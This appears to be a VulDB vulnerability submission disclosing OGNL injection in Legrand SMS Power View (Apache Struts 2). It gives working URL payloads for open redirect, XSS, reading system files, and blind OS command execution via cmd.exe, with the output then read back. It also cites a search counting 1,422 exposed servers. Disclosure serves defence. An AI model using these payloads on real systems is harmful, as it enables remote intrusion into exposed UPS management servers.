| Title | Legrand SMS Power View 1.x.x OS Command Injection |
|---|
| Description | Vulnerability Report: OGNL Injection in SMS Power View
The SMS Power View system enables local and remote UPS management via TCP/IP and the internet.
During OGNL Injection exploitation attempts, it was identified that all servers running this system use Apache Struts 2 (vulnerable version) in their codebase. This allowed the exploitation of OGNL Injection, leading to the following vulnerabilities:
Open Redirect
Cross-Site Scripting (XSS)
Local File Inclusion (LFI)
OS Command Injection
A global search revealed 1,422 servers running SMS Power View, all of which are potentially vulnerable. (Search performed via FOFA: https://en.fofa.info/result?qbase64=dGl0bGU9IlNNUyBQb3dlciBWaWV3Ig%3D%3D&page=1&page_size=10)
Exploitation Details
Open Redirect
Allows attackers to redirect users to malicious websites, facilitating phishing campaigns.
Payload:
http://x.x.x.x:9191/?redirect:https://www.google.com
Cross-Site Scripting (XSS)
Enables attackers to inject and execute malicious JavaScript in users' browsers.
Payload:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23webroot%3d%23req.getSession().getServletContext().getRealPath(%27/%27),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.print(%27%3cscript%3ealert(%22Fr1t0%22)%3c%2fscript%3e%20%27),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()}
Local File Inclusion (LFI)
Enables unauthorized access to sensitive system files.
Payload:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:\\Windows\\System32\\drivers\\etc\\hosts%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDelimiter(%27\\A%27).next(),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.println(%23data),%23resp.flush(),%23resp.close()}
Blind OS Command Injection
Allows attackers to execute arbitrary system commands remotely.
Payload:
http://x.x.x.x:9191/?redirect%3a%24%7b%23cmd%3d'whoami%20%3e%20C%3a%5c%5cWindows%5c%5cTemp%5c%5coutput.txt'%2c%23proc%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String%5b%5d%7b'cmd.exe'%2c'%2fc'%2c%23cmd%7d).start()%2c%23proc.waitFor()%7d
Since the command output is not returned directly in the request, it is necessary to write the execution result to a .txt file in the Temp directory. The output can then be retrieved using LFI:
Retrieve Execution Output:
http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:/Windows/Temp/output.txt%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDelimiter(%27\\A%27).next(),%23resp%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23resp.println(%23data),%23resp.flush(),%23resp.close()} |
|---|
| Source | ⚠️ http://x.x.x.x:9191/?redirect:${%23req%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27),%23file%3dnew+java.io.File(%27C:/Windows/Temp/output.txt%27),%23scanner%3dnew+java.util.Scanner(%23file),%23data%3d%23scanner.useDeli |
|---|
| User | Fr1t0 (UID 82967) |
|---|
| Submission | 03/19/2025 20:54 (1 Year ago) |
|---|
| Moderation | 03/30/2025 09:58 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 302032 [Legrand SMS PowerView 1.x redirect] |
|---|
| Points | 20 |
|---|